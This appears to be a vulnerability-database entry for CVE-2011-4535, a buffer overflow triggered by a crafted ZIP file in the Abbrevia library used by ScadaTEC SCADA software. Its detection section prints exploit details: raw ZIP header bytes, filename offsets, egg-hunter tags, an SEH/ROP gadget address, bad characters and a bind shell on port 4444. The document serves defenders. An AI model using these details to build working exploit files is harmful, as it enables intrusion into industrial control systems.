cbcvebase.
CVE-2011-4535
published 2012-04-03

CVE-2011-4535: Buffer overflow in TurboPower Abbrevia before 4.0, as used in ScadaTEC ScadaPhone 5.3.11.1230 and earlier, ScadaTEC ModbusTagServer 4.1.1.81 and earlier, and…

PriorityP346medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
27.00%
97.8th percentile
Buffer overflow in TurboPower Abbrevia before 4.0, as used in ScadaTEC ScadaPhone 5.3.11.1230 and earlier, ScadaTEC ModbusTagServer 4.1.1.81 and earlier, and other products, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted ZIP file.

Affected

3 ranges
VendorProductVersion rangeFixed in
craig_petersonturbopower_abbrevia<= 3.05
scadatecmodbustagserver<= 4.1.1.81
scadatecscadaphone<= 5.3.11.1230

Detection & IOCsextracted from sources · hover to see the quote

filenamescadatec.zip
port4444
registrypop esi; pop ebx; retn @ 0x004014F4 (ScadaPhone.exe)
bytes
\x50\x4b\x03\x04\x14\x00\x00\x00\x00\x00\xb7\xac\xce\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00
bytes
\x50\x4b\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xb7\xac\xce\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00
bytes
\x50\x4b\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00
bytes
\xac\x14\x40\x00
bytes
zipz
bytes
OMFG
bytes
\x1e\x74\x78\x74
  • Malicious ZIP file has a crafted filename field of 4064 bytes (offset) used to trigger the stack buffer overflow in Abbrevia 3.x ZIP handling component; look for ZIP local file header entries with filename length (0x0fe4 = 4068) far exceeding normal values.
  • Exploit ZIP contains a Central Directory File header with an oversized filename field matching the local file header; both lf_header and cdf_header share the same anomalous filename length bytes \xe4\x0f.
  • For the ModbusTagServer target, the exploit uses a structured egg-hunter stub with the tag 'OMFG' embedded in the filename field at offset 229, followed by 48 bytes of padding, NSEH/SEH overwrite, and shellcode — detect ZIP files with binary egg-hunter patterns in the filename field.
  • For the ScadaPhone target, the exploit uses a ROP chain starting at offset 57 within the filename field; the SEH overwrite uses address 0x004014F4 (pop esi; pop ebx; retn from ScadaPhone.exe) — flag ZIP files where the filename field contains sequences of ROP gadget addresses from ScadaPhone.exe base.
  • Metasploit module generates a ZIP with a randomly named file (229 uppercase alpha chars + egghunter + padding + jmp_short(-50) + 2 bytes + ret address + 100 bytes + egg + filler to 4096 + trailing dword 0x7478741e); detect ZIP files with filename length >= 4096 and trailing bytes \x1e\x74\x78\x74.
  • Successful exploitation results in a bind shell; monitor for unexpected outbound/inbound connections on port 4444 from ScadaPhone.exe or ModbusTagServer.exe processes.
  • The egghunter tag used by the Metasploit module is 'zipz' (0x7a69707a); scan process memory or network payloads for this egg tag in conjunction with ScadaTEC product processes.
  • Payload bad characters are \x00, \x0a, \x0d — shellcode in malicious ZIP filenames will not contain null bytes, line feeds, or carriage returns; use this to tune shellcode detection signatures.
  • ·The exploit requires user interaction — a victim must manually open the crafted ZIP file using the affected ScadaPhone or ModbusTagServer application; it is not a zero-click remote exploit.
  • ·The ROP gadget addresses and SEH handler addresses in the public exploits are hardcoded for specific module versions (ScadaPhone.exe, abbrevia DLLs at fixed base addresses); ASLR or different binary versions will break these offsets.
  • ·The Metasploit module target is labeled 'Windows Universal' but relies on a non-ASLR address from ScadaPhone.exe; effectiveness is limited to the exact vulnerable binary version on Windows XP-era systems without ASLR.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.